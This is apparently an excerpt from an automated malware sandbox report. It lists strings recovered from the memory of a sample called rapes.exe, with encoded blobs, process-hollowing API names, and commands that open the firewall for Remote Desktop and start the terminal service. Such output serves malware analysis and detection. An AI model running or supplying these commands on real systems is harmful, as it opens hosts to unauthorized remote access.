RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe    String found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000E.00000002.3640463719.0000000000031000.00000040.00000001.01000000.00000011.sdmp    String found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000E.00000002.3640463719.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 0000000E.00000003.1272781808.0000000004CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 0000000E.00000003.1272781808.0000000004CA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 00000016.00000003.1658838706.0000000004850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 00000016.00000003.1658838706.0000000004850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 00000016.00000002.1699111613.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 00000016.00000002.1699111613.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 00000019.00000002.2294441553.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 00000019.00000002.2294441553.0000000000031000.00000040.00000001.01000000.00000011.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d 
RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
                                    Source: rapes.exe, 00000019.00000003.2254111649.0000000004B00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                                    Source: rapes.exe, 00000019.00000003.2254111649.0000000004B00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS 